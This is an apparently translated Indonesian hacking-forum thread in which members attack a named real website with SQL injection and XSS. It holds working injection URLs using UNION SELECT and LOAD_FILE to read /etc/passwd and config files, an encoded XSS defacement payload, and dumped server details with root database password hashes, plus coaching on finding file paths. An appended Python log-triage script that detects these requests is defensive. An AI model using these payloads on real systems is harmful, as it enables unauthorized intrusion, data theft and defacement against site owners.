Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, privilege escalation, exploits, covering tracks and backdoors through to securing websites
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Discusses bugs, penetration, exploitation and techniques for securing websites and web servers. Include a PoC here so members can learn from it.
-
untouch
- Posts: 19
- Joined: Fri Feb 26, 2010 11:36 am
Post
by untouch » Sun Feb 28, 2010 12:53 am
cloroplast wrote:Target:
http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1
:ngakak: :ngakak: :ngakak:
How does your tinkering come out so neatly organized like that???
What tool did you use, bro? :tapa:
-
anomie03
- Posts: 43
- Joined: Wed Feb 24, 2010 10:58 pm
Post
by anomie03 » Sun Feb 28, 2010 1:10 am
No tool, I just used Google, bro.
-
3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
Post
by 3xtr3m3b0y » Sun Feb 28, 2010 8:51 am
Another Vuln :
Code: Select all
http://www.fragrance.org/fifi_winners.php?year=%3Cscript%3Edocument.write(%27\u003C\u0068\u0031\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0063\u0065\u006E\u0074\u0065\u0072\u003E\u003C\u0062\u006C\u0069\u006E\u006B\u003E\u0033\u0078\u0074\u0072\u0033\u006D\u0033\u0062\u0030\u0079\u0020\u0077\u0034\u0035\u0020\u0068\u0033\u0072\u0033\u002E\u002E\u002E\u0021\u0021\u0021\u003C\u002F\u0062\u006C\u0069\u006E\u006B\u003E\u003C\u002F\u0063\u0065\u006E\u0074\u0065\u0072\u003E%27);%3C/script%3E
...n0 l1m17...
-
apriliana
- Posts: 38
- Joined: Mon Mar 26, 2007 2:02 am
- Location: jogja
Post
by apriliana » Mon Mar 08, 2010 12:46 pm
Next Clue :
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,2,3,4,load_file(0x2f7573722f6c6f63616c2f617061636865322f6874646f63732f436f6e6e656374696f6e732f636f6e6e46462e706870),6--
After the page opens, try View Source...
How did you know that /usr/local/apache2/htdocs exists?
In /etc/passwd the closest thing there is /usr/local/apache.
How do you find out which folder the index is placed in? Give me a clue, please... :putusasa:
-
apriliana
- Posts: 38
- Joined: Mon Mar 26, 2007 2:02 am
- Location: jogja
Post
by apriliana » Mon Mar 08, 2010 1:49 pm
Correction to my previous post: not the index.
Are there any tips for finding out where a website's config files are located?
-
3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
Post
by 3xtr3m3b0y » Mon Mar 08, 2010 2:07 pm
apriliana wrote:Next Clue :
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,2,3,4,load_file(0x2f7573722f6c6f63616c2f617061636865322f6874646f63732f436f6e6e656374696f6e732f636f6e6e46462e706870),6--
After the page opens, try View Source...
How did you know that /usr/local/apache2/htdocs exists?
In /etc/passwd the closest thing there is /usr/local/apache.
How do you find out which folder the index is placed in? Give me a clue, please... :putusasa:
To make determining the PATH easier, we should first find out the OS type:
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,@@version_compile_os,3,4,5,6--
Result:
portbld-freebsd6.2
From that initial information, the search for important locations on the system can be carried out...
http://wiki.apache.org/httpd/DistrosDefaultLayout
...n0 l1m17...
-
peniru
- Posts: 389
- Joined: Fri Jan 25, 2008 9:12 am
- Location: makassar
Post
by peniru » Mon Mar 08, 2010 6:10 pm
3xtr3m3b0y wrote:cloroplast wrote:Target:
http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1
:ngakak: :ngakak: :ngakak:
Wow, great results from your adventure, bro... :love:
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,user(),3,4,5,6+from+mysql.user--
System User: root@localhost << allows us to use additional features of the MySQL server, namely
LOAD_FILE (reads a file that exists on the system) and
INTO+OUTFILE (creates a file on the system). Unfortunately, because the directive
magic_quotes_gpc = on, we cannot use the INTO+OUTFILE feature, since that feature can only take a STRING.
To check the type of OS in use, which is useful for determining the directory structure of important locations on the system:
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,@@version_compile_os,3,4,5,6--
Example of opening the contents of the /etc/passwd file on the system:
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6--
from here it can be developed to the next stage...
Bro, how do I display detailed web info like the above? Do you use a py or pl script?? Or is there an easier way??
.::. My Sign .::.
..noobie Pool..
Whether or not you use tools doesn't matter; what matters is understanding what is being done.
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
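Added example (not part of the thread): a defender-side triage of web access logs for the request shapes shown in the posts above (UNION SELECT in a numeric id parameter, @@ server variables, LOAD_FILE with a hex-encoded path). The log lines, IP addresses and rule names are constructed for illustration; the hex literal is the /etc/passwd one quoted in the thread.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (documentation IPs, not taken from the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [08/Mar/2010:12:40:01 +0700] "GET /news_detail.php?id=36 HTTP/1.1" 200 8211
203.0.113.7 - - [08/Mar/2010:12:41:10 +0700] "GET /news_detail.php?id=-36+union+select+1,@@version_compile_os,3,4,5,6-- HTTP/1.1" 200 7990
203.0.113.7 - - [08/Mar/2010:12:46:32 +0700] "GET /news_detail.php?id=-36+UNION+SELECT+1,load_file(0x2f6574632f706173737764),3,4,5,6-- HTTP/1.1" 200 9120
198.51.100.4 - - [08/Mar/2010:12:47:00 +0700] "GET /fifi_winners.php?year=2009 HTTP/1.1" 200 4310
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Hypothetical rule names; each pattern runs on the URL-decoded query string.
RULES = {
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "server_variable": re.compile(r"@@\w+"),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2}){4,})\b", re.I)

def decode_hex_literals(text):
    """Return printable strings hidden in MySQL 0x... literals (quote-free paths)."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(match.group(1))
        if all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded

def triage(log_text):
    """Return one finding per request line whose query matches any rule."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        path, _, raw_query = target.partition("?")
        query = unquote_plus(raw_query)  # '+' and %xx hide the keywords in raw logs
        hits = [name for name, rx in RULES.items() if rx.search(query)]
        if hits:
            findings.append({"client": client, "path": path, "rules": hits,
                             "decoded": decode_hex_literals(query)})
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Decoding the hex literals matters because the file path never appears as a quoted string in the request, so a filter that only looks for quotes or for "/etc/passwd" in the raw URL misses it.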